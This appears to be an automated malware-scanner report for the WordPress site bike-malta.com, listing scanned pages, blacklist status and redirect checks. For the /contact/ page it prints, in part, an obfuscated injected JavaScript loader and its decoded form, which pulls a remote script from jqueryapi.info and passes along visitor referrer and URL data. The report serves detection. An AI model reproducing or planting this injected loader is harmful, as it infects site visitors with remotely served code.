New scan:

Malware Scanner report for bike-malta.com

Malicious/Suspicious/Total urls checked
1/0/16
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "bike-malta.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/1
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=bike-malta.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://bike-malta.com/
200 OK
Content-Length: 29040
Content-Type: text/html
clean
http://bike-malta.com/wp-includes/js/comment-reply.min.js
200 OK
Content-Length: 757
Content-Type: application/javascript
clean
http://bike-malta.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js
200 OK
Content-Length: 14723
Content-Type: application/javascript
clean
http://bike-malta.com/wp-content/plugins/contact-form-7/includes/js/scripts.js
200 OK
Content-Length: 8326
Content-Type: application/javascript
clean
http://bike-malta.com//contact/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 19:51:40 GMT
Location: http://bike-malta.com/contact/
Server: Apache/2.2.25
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://bike-malta.com/xmlrpc.php
X-Powered-By: PHP/5.2.17
clean
http://bike-malta.com/contact/
200 OK
Content-Length: 27324
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var _001='KkSKpcCfngCdpxGcz5yJlxWe0N3NywXe0lGbpJWazlmd3IDft92Y8RWS5JEduVWblxWR0V2Z8B3boNHfyQ2br91cqhjM8hGdkl2d85WZkRWaoF0M8RWYlhGfl1WYOdWYUlnQzRnbl1WZsVEdldGf4BHM4EzNywnclJnclZWZyxHewBDMycjM8RHanlWZoxXZwF2YzVmb1xXZ0lmc3xHbyVHfkF2bs52b3IDfl1WYyZWa3IDfvZmbpxHduVWb1N2bkR0M8NmczRXZnx3avxXZ0VnYpJHd0FEdlNHfmVmc8Rnbl1Wdj9GZ4IDf2lGZ3IDfmlGMywHZlRWYvxGf05WZ2VEajFGd0FGfnFGV2lGZwIDf39GZul2d4IDfkF2bsdjM8JDZvt2XzpWOwwXawFWeyVWdxpGfu9Wa0Nmb1ZWQwwXZzxWYmBjM8JXY2FEM8lHZvJGf0BXayN2cDNDfwRHdoxHduVmbvBXbvNUSSVVZk9
... 3683 bytes are skipped ...
3=l0OlOI.indexOf(data.charAt(i++));h4=l0OlOI.indexOf(data.charAt(i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String.fromCharCode(o1)}else if(h4==64){enc+=String.fromCharCode(o1,o2)}else{enc+=String.fromCharCode(o1,o2,o3)}}while(i<data.length);return enc} function l0O(string){ var ret = '', i = 0; for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);} return ret; }eval(OI0(l0O(_001)));

Decoded script:


eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e,
... 15693 bytes are skipped ...
px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var _10O=document.createElement('script');_10O.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _0Ol=document.getElementsByTagName('head')[0];_0Ol.appendChild(_10O);document.write(unescape(_escape));

Antivirus reports:

McAfee-GW-Edition
Heuristic.BehavesLike.JS.Suspicious.G

http://bike-malta.com/contact/img/ga.js
500 timeout
Content-Length: 30
Content-Type: text/plain
clean
http://bike-malta.com/test404page.js
500 timeout
Content-Length: 30
Content-Type: text/plain
clean
http://bike-malta.com/wp-content/themes/wp_malta/js/jquery.js
200 OK
Content-Length: 252887
Content-Type: application/javascript
clean
http://bike-malta.com/wp-content/themes/wp_malta/js/jquery.nivo.slider.js
200 OK
Content-Length: 29113
Content-Type: application/javascript
clean
http://bike-malta.com/wp-content/themes/wp_malta/js/add.js
200 OK
Content-Length: 2247
Content-Type: application/javascript
clean
http://bike-malta.com/wp-includes/js/jquery/jquery.js
200 OK
Content-Length: 95807
Content-Type: application/javascript
clean
http://bike-malta.com/wp-includes/js/jquery/jquery-migrate.min.js
200 OK
Content-Length: 7199
Content-Type: application/javascript
clean
http://bike-malta.com/wp-content/plugins/biz-calendar/calendar.js
200 OK
Content-Length: 8136
Content-Type: application/javascript
clean
http://bike-malta.com/shop/
200 OK
Content-Length: 26571
Content-Type: text/html
clean
http://bike-malta.com/fix/
200 OK
Content-Length: 31566
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: bike-malta.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 19:51:31 GMT
Server: Apache/2.2.25
Content-Type: text/html; charset=UTF-8
Link: <http://bike-malta.com/>; rel=shortlink
X-Pingback: http://bike-malta.com/xmlrpc.php
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: bike-malta.com
Referer: http://www.google.com/search?q=bike-malta.com

Result:
The result is similar to the first query. There are no suspicious redirects found.